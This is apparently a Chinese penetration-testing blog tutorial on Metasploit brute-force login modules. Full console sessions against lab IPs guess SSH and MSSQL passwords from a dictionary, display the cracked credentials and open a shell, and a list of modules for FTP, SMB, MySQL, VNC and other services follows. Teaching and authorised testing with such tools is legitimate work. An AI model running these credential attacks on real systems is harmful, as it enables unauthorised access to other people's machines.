暴力破解工具metasploit模块

看着博客敲代码

已于 2022-08-05 16:33:26 修改

阅读量831

点赞数

分类专栏：渗透测试文章标签：渗透测试安全

于 2021-11-30 21:33:00 首次发布

本文链接：https://blog.csdn.net/qq_46023525/article/details/121642932

版权

渗透测试专栏收录该内容

13 篇文章 0 订阅

订阅专栏

暴力破解工具metasploit模块使用

文章仅供学习。用于其他用途而产生不良后果,作者不承担任何法律责任!

┌──(root💀kali)-[~/桌面]
└─# msfconsole  

       =[ metasploit v6.0.15-dev                          ]
+ -- --=[ 2071 exploits - 1123 auxiliary - 352 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: Metasploit can be configured at startup, see msfconsole --help to learn more

msf6 >

现在已经是进入到metasploit中了这篇主要说暴力破解模块

use 使用模块
set 设置
show options 查询设置
back 返回
info 查询模块的信息
exploit/run 运行模块

ssh示例

msf6 > use auxiliary/scanner/ssh/ssh_login      #使用模块
msf6 auxiliary(scanner/ssh/ssh_login) > info    #查询模块的信息

       Name: SSH Login Check Scanner
     Module: auxiliary/scanner/ssh/ssh_login
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  todb <todb@metasploit.com>

Check supported:
  No

Basic options:
  Name              Current Setting  Required  Description
  ----              ---------------  --------  -----------
  BLANK_PASSWORDS   false            no        Try blank passwords for all users
  BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
  DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
  DB_ALL_PASS       false            no        Add all passwords in the current database to the list
  DB_ALL_USERS      false            no        Add all users in the current database to the list
  PASSWORD                           no        A specific password to authenticate with
  PASS_FILE                          no        File containing passwords, one per line
  RHOSTS                             yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT             22               yes       The target port
  STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
  THREADS           1                yes       The number of concurrent threads (max one per host)
  USERNAME                           no        A specific username to authenticate as
  USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
  USER_AS_PASS      false            no        Try the username as the password for all users
  USER_FILE                          no        File containing usernames, one per line
  VERBOSE           false            yes       Whether to print output for all attempts

Description:
  This module will test ssh logins on a range of machines and report 
  successful logins. If you have loaded a database plugin and 
  connected to a database this module will record successful logins 
  and hosts so you can track your access.

References:
  https://cvedetails.com/cve/CVE-1999-0502/

msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.21.141
RHOSTS => 192.168.21.141       #指定目标IP

msf6 auxiliary(scanner/ssh/ssh_login) > set USERNAME root
USERNAME => root            #指定目标用户
msf6 auxiliary(scanner/ssh/ssh_login) > set PASS_FILE /root/passwd.txt              #指定密码字典
PASS_FILE => /root/passwd.txt

msf6 auxiliary(scanner/ssh/ssh_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true                #得出正确密码后停止
msf6 auxiliary(scanner/ssh/ssh_login) > set THREADS 16   #设置线程
THREADS => 16
msf6 auxiliary(scanner/ssh/ssh_login) > run    #开始执行  或者exploit 命令

[+] 192.168.21.141:22 - Success: 'root:111111' 'uid=0(root) gid=0(root) 组=0(root) 环境=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 Linux localhost.localdomain 3.10.0-957.el7.x86_64 #1 SMP Thu Nov 8 23:39:32 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux '
[*] Command shell session 1 opened (192.168.21.147:44141 -> 192.168.21.141:22) at 2021-11-30 20:51:21 +0800
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_login) > 
用户名为root 密码为111111

mssql示例

msf6 auxiliary(scanner/ssh/ssh_login) > back
msf6 > use auxiliary/scanner/mssql/mssql_login #使用mssql模块
msf6 auxiliary(scanner/mssql/mssql_login) > show options  #查看配置信息

Module options (auxiliary/scanner/mssql/mssql_login):

   Name                 Current Setting  Required  Description

----                 ---------------  --------  -----------

   BLANK_PASSWORDS      true             no        Try blank passwords for all users
   BRUTEFORCE_SPEED     5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS         false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS          false            no        Add all passwords in the current database to the list
   DB_ALL_USERS         false            no        Add all users in the current database to the list
   PASSWORD                              no        A specific password to authenticate with
   PASS_FILE                             no        File containing passwords, one per line
   RHOSTS                                yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT                1433             yes       The target port (TCP)
   STOP_ON_SUCCESS      false            yes       Stop guessing when a credential works for a host
   TDSENCRYPTION        false            yes       Use TLS/SSL for TDS data "Force Encryption"
   THREADS              1                yes       The number of concurrent threads (max one per host)
   USERNAME             sa               no        A specific username to authenticate as
   USERPASS_FILE                         no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS         false            no        Try the username as the password for all users
   USER_FILE                             no        File containing usernames, one per line
   USE_WINDOWS_AUTHENT  false            yes       Use windows authentification (requires DOMAIN option set)
   VERBOSE              true             yes       Whether to print output for all attempts

msf6 auxiliary(scanner/mssql/mssql_login) > set DB_ALL_USERS true
DB_ALL_USERS => true   #设置用户
msf6 auxiliary(scanner/mssql/mssql_login) > set PASS_FILE /root/passwd.txt        #设置密码字典
PASS_FILE => /root/passwd.txt
msf6 auxiliary(scanner/mssql/mssql_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true       #得到正确密码后自动停止
msf6 auxiliary(scanner/mssql/mssql_login) > set RHOSTS 192.168.21.162         # 指定目标IP
RHOSTS => 192.168.21.162
msf6 auxiliary(scanner/mssql/mssql_login) > exploit   #开始执行
[*] 192.168.21.162:1433   - 192.168.21.162:1433 - MSSQL - Starting authentication scanner.
[-] 192.168.21.162:1433   - 192.168.21.162:1433 - LOGIN FAILED: WORKSTATION\sa:sanhe000~!@#   (Incorrect: )
[+] 192.168.21.162:1433   - 192.168.21.162:1433 - Login Successful: WORKSTATION\sa:123456
[*] 192.168.21.162:1433   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/mssql/mssql_login) > 
用户名为sa 密码为123456

ftp

msf6 > auxiliary/scanner/ftp/ftp_login

telnet

msf6 > auxiliary/scanner/telnet/telnet_login

smb

msf6 > auxiliary/scanner/smb/smb_login

MySQL

msf6 > auxiliary/scanner/mysql/mysql_login

Oracle

msf6 > auxiliary/scanner/oracle/oracle_login

postgres

msf6 > auxiliary/scanner/postgres/postgres_login

vnc

msf6 > auxiliary/scanner/vnc/vnc_login

pcanywhere

msf6 > auxiliary/scanner/pcanywhere/pcanywhere_login

snmp

msf6 > auxiliary/scanner/snmp/snmp_login

看着博客敲代码

关注

0
点赞
踩
3

收藏

觉得还不错? 一键收藏
打赏
0
评论
暴力破解工具metasploit模块

暴力破解工具metasploit模块使用文章仅供学习。用于其他用途而产生不良后果,作者不承担任何法律责任!┌──(root????kali)-[~/桌面]└─# msfconsole =[ metasploit v6.0.15-dev ]+ -- --=[ 2071 exploits - 1123 auxiliary - 352 post ]+ -- --=[ 592 payloads - 45 encoders -
复制链接

扫一扫